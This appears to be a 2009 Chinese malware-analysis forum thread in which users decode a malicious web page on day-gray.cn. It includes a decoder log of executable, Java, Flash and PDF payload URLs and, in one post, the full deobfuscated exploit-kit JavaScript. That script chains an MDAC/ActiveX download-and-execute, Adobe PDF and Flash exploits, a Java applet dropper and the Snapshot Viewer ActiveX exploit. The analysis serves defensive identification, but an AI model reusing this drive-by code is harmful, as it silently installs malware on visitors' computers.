http://day-gray.cn/news.php?s=45c25f0a92

显示全部楼层 · 发表于 2009-10-9 16:16:15

关于:解密的日志(全体输出 -  14):
Level  1>http://lib.ru/webmaster/robots.txt
Level  1>http://day-gray.cn/hiprz1.exe  ●
Level  1>http://day-gray.cn/sdfg.jar
Level  1>http://day-gray.cn/dshdsgfh4.exe?jas
Level  1>http://day-gray.cn/egntv7.exe  ●
Level  1>http://day-gray.cn/manual.swf  ●
Level  2>http://www.zmjjjyy.cn/new/a5.css  ●
Level  2>http://day-gray.cn/bdeorw3.exe  ●
Level  1>http://day-gray.cn/click.php?r=
Level  1>http://day-gray.cn/sdgsg5.exe  ●
Level  1>http://day-gray.cn/ilwy.pdf
Level  2>http://day-gray.cn/abkpru2.exe  ●
Level  2>http://day-gray.cn/ckrtvx2.exe  ●
Level  2>http://day-gray.cn/cgikny2.exe  ●
日志由 Redoce2.0第45次修正版于 2009-10-9 16:14:40 生成。

显示全部楼层 · 发表于 2009-10-9 16:59:34

第一步就被难住了。。。。。解不下去

显示全部楼层 · 发表于 2009-10-9 17:55:34

MDecoder解不了

显示全部楼层 · 发表于 2009-10-9 20:07:26

用MDecoder对付洋马。。。。。

显示全部楼层 · 发表于 2009-10-9 22:29:41

吃了看不懂代码又不懂编程的亏了。。。。花了N长时间才搞明白[:xi19:]

function dfno(){if(1==2){setTimeout('location.href = "http://lib.ru/WEBMASTER/robots.txt"',5000);}else{setTimeout('location.href = "http://lib.ru/WEBMASTER/robots.txt"',9000);}}
var urltofile='http://day-gray.cn/bghz1.exe';var filename='bghz.exe';function CreateO(o,n){var r=null;try{r=o.CreateObject(n)}catch(e){}
if(!r){try{r=o.CreateObject(n,'')}catch(e){}}
if(!r){try{r=o.CreateObject(n,'','')}catch(e){}}
if(!r){try{r=o.GetObject('',n)}catch(e){}}
if(!r){try{r=o.GetObject(n,'')}catch(e){}}
if(!r){try{r=o.GetObject(n)}catch(e){}}
return r;}
function Go(a){var s=CreateO(a,'WScript.Shell');var o=CreateO(a,'ADODB.Stream');var e=s.Environment('Process');var xhr=null;var bin=e.Item('TEMP')+'\\'+filename;try{xhr=new XMLHttpRequest();}
catch(e){try{xhr=new ActiveXObject('Microsoft.XMLHTTP');}
catch(e){xhr=new ActiveXObject('MSXML2.ServerXMLHTTP');}}
if(!xhr)return(0);xhr.open('GET',urltofile,false)
xhr.send(null);var filecontent=xhr.responseBody;o.Type=1;o.Mode=3;o.Open();o.Write(filecontent);o.SaveToFile(bin,2);s.Run(bin,0);}
function kmowx(){var mdacok=0;var i=0;var objects=new Array('{BD96C556-65A3-11D0-983A-00C04FC29E36}','{BD96C556-65A3-11D0-983A-00C04FC29E36}','{AB9BCEDD-EC7E-47E1-9322-D4A210617116}','{0006F033-0000-0000-C000-000000000046}','{0006F03A-0000-0000-C000-000000000046}','{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}','{6414512B-B978-451D-A0D8-FCFDF33E833C}','{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}','{06723E09-F4C2-43c8-8358-09FCD1DB0766}','{639F725F-1B2D-4831-A9FD-874847682010}','{BA018599-1DB3-44f9-83B4-461454C84BF8}','{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}','{E8CCCDDF-CA28-496b-B050-6C07C962476B}',null);while(objects){var a=null;if(objects.substring(0,1)=='{'){a=document.createElement('object');a.setAttribute('classid','clsid:'+objects.substring(1,objects.length-1));}else{try{a=new ActiveXObject(objects);}catch(e){}}
if(a){try{var b=CreateO(a,'WScript.Shell');if(b){if(Go(a)){mdacok=1;break;}}}catch(e){}}
i++;}
if(mdacok==1){dfno();}else{cein();}}
function cein(){var abhrx=false;if(navigator.plugins&&navigator.plugins.length){for(var bcegy=0;bcegy<navigator.plugins.length;bcegy++){if(navigator.plugins[bcegy].description.indexOf('Adobe Acrobat')!=-1){abhrx=true;break;}
if(navigator.plugins[bcegy].description.indexOf('Adobe PDF')!=-1){abhrx=true;break;}}}else if(window.ActiveXObject){var adehx=null;try{adehx=new ActiveXObject('AcroPDF.PDF');}catch(e){}
if(!adehx){try{adehx=new ActiveXObject('PDF.PdfCtrl');}catch(e){}}
if(adehx){abhrx=true;}}
if(abhrx){var ua=navigator.userAgent.toLowerCase();if(ua.indexOf("firefox")!=-1){var fimqst=document.createElement('embed');fimqst.setAttribute('src','./eglnv.pdf');fimqst.setAttribute('href','./eglnv.pdf');fimqst.setAttribute('type','application/pdf');fimqst.setAttribute('width',7);fimqst.setAttribute('height',8);fimqst.setAttribute('style','display:none;');document.body.appendChild(fimqst);}else{var fimqst=document.createElement('iframe');fimqst.setAttribute('src','./eglnv.pdf');fimqst.setAttribute('width',20);fimqst.setAttribute('height',9);fimqst.setAttribute('style','display:none;');document.body.appendChild(fimqst);}
setTimeout(fpwz(),438);return;}
fpwz();return;}
function fpwz(){var PlayerVersion=[0,0,0];if(navigator.plugins&&navigator.mimeTypes.length){var x=navigator.plugins["Shockwave Flash"];if(x&&x.description){PlayerVersion=x.description.replace(/([a-zA-Z]|\s)+/,"").replace(/(\s+r|\s+b[0-9]+)/,".").split(".");}}else{try{var fv=new ActiveXObject("ShockwaveFlash.ShockwaveFlash.7");if(fv!=null){PlayerVersion=fv.GetVariable("\$version").split(" ")[1].split(",");}}catch(e){epuwz();return;}}
var version1=PlayerVersion[0]!=null?parseInt(PlayerVersion[0]):0;var version2=PlayerVersion[1]!=null?parseInt(PlayerVersion[1]):0;var version3=PlayerVersion[2]!=null?parseInt(PlayerVersion[2]):0;if(version1==9&&version3<124){var ua=navigator.userAgent.toLowerCase();if(ua.indexOf("firefox")!=-1){var swfelement=document.createElement('embed');document.body.appendChild(swfelement);swfelement.width='1';swfelement.height='1';swfelement.src='./manual.swf';swfelement.type='application/x-shockwave-flash';}else{var swfelement=document.createElement('iframe');swfelement.setAttribute('src','./manual.swf');swfelement.setAttribute('width',200);swfelement.setAttribute('height',200);swfelement.setAttribute('style','display:none;');document.body.appendChild(swfelement);}}
epuwz();}
function epuwz(){var rwoLXUtl='<applet code="myf.y.AppletX.class" archive="http://day-gray.cn/sdfg.jar" width="300" height="300">'+'<param name="data" value="http://day-gray.cn/dshdsgfh4.exe?jas">'+'<param name="cc" value="1">'+'</applet>';var NZWhjVxX=document.createElement("div");NZWhjVxX.innerHTML=rwoLXUtl;document.body.appendChild(NZWhjVxX);dent();}
function dent(){var cipwy;var dkmu;var krsuv=new Array();krsuv[0]='c:/Program Files/Outlook Express/wab.exe';krsuv[1]='d:/Program Files/Outlook Express/wab.exe';krsuv[2]='e:/Program Files/Outlook Express/wab.exe';try{var dkmu=new ActiveXObject('snpvw.Snapshot Viewer Control.1');}catch(e){try{var dkmu=document.createElement('object');dkmu.setAttribute('classid','clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9');dkmu.setAttribute('id','dkmu');dkmu.setAttribute('width','1');dkmu.setAttribute('height','1');document.body.appendChild(dkmu);}catch(e){dfno();return;}}
if(dkmu='[object]'){for(cipwy in krsuv){try{dkmu=new ActiveXObject('snpvw.Snapshot Viewer Control.1');var buf=krsuv[cipwy];dkmu.Zoom=0;dkmu.ShowNavigationButtons=false;dkmu.AllowContextMenu=false;dkmu.SnapshotPath='http://day-gray.cn/eilnot7.exe';dkmu.CompressedPath=buf;dkmu.PrintSnapshot();var cemtu=document.createElement('iframe');cemtu.setAttribute('id','cemtu');cemtu.setAttribute('src','ldap://127.0.0.1');cemtu.setAttribute('width',1);cemtu.setAttribute('height',1);cemtu.setAttribute('style','display:none;');document.body.appendChild(cemtu);var ahintx=setInterval(ajlotx(),2100);}catch(e){dfno();return;}}}
dfno();return;}
function ajlotx(){if(dkmu.readyState==4){clearInterval(ahintx);}}
kmowx();

显示全部楼层 · 发表于 2009-10-9 22:37:01

404 Not Found

404 Not FoundThe requested URL: http://lib.ru/webmaster/robots.txt :
Can't open /webmaster/robots.txt.
Referer: http://lib.ru/

По всем проблемам пишите moshkow@systud.msk.su

Возврат в Библиотеку

Возврат в текущий раздел

Возможно, эта страница найдется на зеркалах библиотеки

Поиск в текущем разделе:

这哪找的啊....真强

显示全部楼层 · 发表于 2009-10-10 06:36:59

这个就是解密的乐趣

[已鉴定] http://day-gray.cn/news.php?s=45c25f0a92

评分

回复 3楼 ljy881227 的帖子

评分

回复 5楼冰比冰水冰的帖子

[已鉴定] http://day-gray.cn/news.php?s=45c25f0a92

评分

回复 3楼 ljy881227 的帖子

评分

回复 5楼 冰比冰水冰 的帖子

回复 5楼冰比冰水冰的帖子